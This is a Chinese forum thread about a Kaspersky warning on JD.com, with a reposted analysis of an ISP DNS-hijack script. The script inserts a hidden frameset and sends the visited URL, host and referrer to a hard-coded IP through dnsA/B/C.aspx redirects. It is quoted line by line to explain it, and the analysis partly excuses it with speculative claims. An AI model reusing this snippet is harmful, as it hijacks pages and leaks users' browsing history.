访问“京东商城”网站，被卡巴弹窗提示。

司狼神威3119

DNS劫持了

司狼神威3119

尊敬的用户，您好！

我下面来分析这个页面文件为什么会被不同的反病毒软件报告为恶意脚本，并且入库的原因，分析起来我认为这个脚本能够劫持用户的页面顶层，显示广告，属于一个叫做“浏览器页面劫持”的典型脚本实现。让我们来分析这个页面脚本。



我们从以上截图最后一行的内容讲起，这是一个页面对象，该对象能够实现在浏览器页面中植入一个“<frameset>”标签，并且定义框架有两行，第一行高度为页面最大高度，第二行高度为零。这个框架里面有两个“<frame>”地址没有写，但是有类ID“main”与“fr1”标识，相关有什么用会在之上的“dnsA.aspx”内部处理。

• <frameset rows="*,0"><frame id="main" src=""><frame id="fr1" src=""></frameset>
  

复制代码

• if (self.location == top.location){ document.location= sa+"dnsA.aspx?AIMT="+su; }
• else { refreshPage(); }
  

复制代码
以上这句话是一个条件判断语句，告诉Javascript引擎要处理一个条件来输出结果，条件当前的页面和祖父页面的地址一致时，则跳转页面到一个地址，现在的地址还没有说明，会在之后的内容中提及。如果不一致的话，则再次刷新当前页面，使用自定义函数refreshPage()完成。

• function refreshPage(){ document.location = sa+"dnsB.aspx?AIMT="+su; }
  

复制代码
以上就是refreshPage()函数的功能定义，其实也是执行了同之上一样的跳转，也就是说无论当前页面与祖父页面是否一致，都会被跳转到一个地址上，并传递给dnsA.aspx一个参数。参数将会在之后的分析中给出。

• function loadfr(){ document.getElementById("fr1").src = sa+"dnsC.aspx?AIMT="+su; }
  

复制代码
这个功能函数loadfr()的作用首先是获取当前页面元素，查找元素标签ID为fr1。我们在之前的分析中已经提到<frame id="fr1" src="">这个“frame”标签，这个功能函数的意思就是将一个地址填充至 src=""中，最终会呈现在浏览器中。

• var pp = "194&pre="+(new Date()).getTime();
• var sa = "http://222.68.193.196/";
• var s=String(window.location.href); var host=escape(s.substring(7,s.indexOf('/',7)));
• var ref=escape(document.referrer); s = escape(s);
• var su = s+"&host="+host+"&refer="+ref+"&server="+pp;
  

复制代码
以上都是Javascript的变量定义，也就是一些最给力的部分。

变量“PP”被赋值“194&pre=1291775004343”，请注意“1291775004343”是一个时刻在变动的值，因为getTime()与new Date()这两个JS自带函数会产生当前的时间与日期，随意会时刻在变动。

变量“sa”被赋值“http://222.68.193.196/”，这是一个IP地址。

变量“s”被赋值为当前用户输入页面的地址，我们举个例子，就那您这个帖子在卡巴斯基论坛的地址来举例：http://bbs.kafan.cn/thread-889000-1-2.html，那么变量“s”会被赋值为“http://bbs.kafan.cn/thread-889000-1-2.html”

变量“host”被赋值为当前用户输入页面地址的以及域名，我们来举个例子，就那您这个帖子在卡巴斯基论坛的地址来举例：http://bbs.kafan.cn/thread-889000-1-2.html，那么变量“host”会被赋值“http://bbs.kafan.cn”，那是为什么呢？那是由于“s.substring()”函数的作用，是从变量“s”中利用“substring()”从“http%3A//bbs.kaspersky.com.cn/thread-889000-1-2.html”这个地址中抽取（indexOf()来实现）。

变量“ref”被赋值为返回当前页面被跳转页面之前的页面，我来解释下这个，比如原先在1.htm页面，存在一个链接到2.htm，在2.htm页面中有这个脚本，那么当我们点击1.htm页面中的链接到达2.htm后，我们发现我们又从2.htm页面中被强制返回到了1.htm，呈现在我们眼前的还是1.htm的页面。同时在用escape()函数对页面脚本进行url编码，举个例子说明，还是以你这个帖子的地址来说明，我们在进入你这个帖子的地址：http://bbs.kafan.cn/thread-889000-1-2.html之前，肯定会到这个地址：http://bbs.kafan.cn/forum-130-2.html，该地址是2011区的版块帖子列表的地址。那么此时变量“ref”被赋值为“http%3A//bbs.kafan.cn/forum-130-2.html”

变量“s”再次被修改赋值，这次它是通过escape()函数被编码，那么这次变量“s”会被最终赋值为““http%3A//bbs.kaspersky.com.cn/thread-889000-1-2.html”，为什么会出现“%3A”，那是由于“String()”函数的作用。”

变量“su”被赋值是一个做“加法”的过程，我们将这个“加法”完成后会形成如下代码：

s+"&host="+host+"&refer="+ref+"&server="+pp
http%3A//bbs.kafan.cn/thread-889000-1-2.html&host=http://bbs.kafan.cn&refer=http%3A//bbs.kafan.cn/forum-130-2.html&server=194&pre=1291775004343

至此我们大部分分析工作已经完成，接下来将相关相关参数传递给dnsA.aspx、dnsB.aspx、dnsC.aspx这三个服务器脚本处理了。由于不知道这三个服务器脚本的内容是做什么的，所以就无法知晓任何事情，因为传入的页面地址包含用户的浏览器浏览隐私，所以可能被不明真相的国外反病毒软件厂商的病毒研究人员认为存在风险，所以就任何这个跳转存在问题。

跳转分别有三个分别为：

sa+"dnsA.aspx?AIMT="+su
sa+"dnsB.aspx?AIMT="+su
sa+"dnsC.aspx?AIMT="+su

那么构建完整的传入参数为，以第一个为例子说下：http://222.68.193.196/dnsA.aspx?AIMT=http%3A//bbs.kafan.cn/thread-889000-1-2.html&host=http://bbs.kafan.cn&refer=http%3A//bbs.kafan.cn/forum-130-2.html&server=194&pre=1291775004343

我们不妨直接访问下看看回到那个地方，嘿嘿。

我们来总结下为什么这个文件会被识别为威胁，之后被解除了。那是因为http://222.68.193.196这个IP的信誉等级极低，查询任何有关于此IP的注册信息均无。同时又提供DNS解析服务，提供wpad.dat文件，所以相关安全软件厂商可能在之前的病毒分析中可能有涉及到这个IP，所以对这个IP来源的东西列黑所致。同时，某些ISP，在这里不点名 有污染DNS的劣迹，所以就会出现这个问题。好在相关问题现在已经澄清。

司狼神威3119

转的别人的帖子

sdwhsea

楼上的厉害！

turnout

xifan000 发表于 2011-1-14 02:00
不管直接地址栏输入：www.360buy.com   ，还是从谷歌、百度、必应 中搜索后，点击链接，都不能访问“京东商 ...

完全正常。

dongwenqi

回复 1楼 xifan000 的帖子

我正常登陆

fatezero

被上海电信劫持了呗，更换DNS

http://bbs.kaspersky.com.cn/redirect.php?goto=findpost&ptid=549900&pid=7063389

david56333

没问题

lllzzzxxx

登陆正常.

1073328164

一切正常啊。。。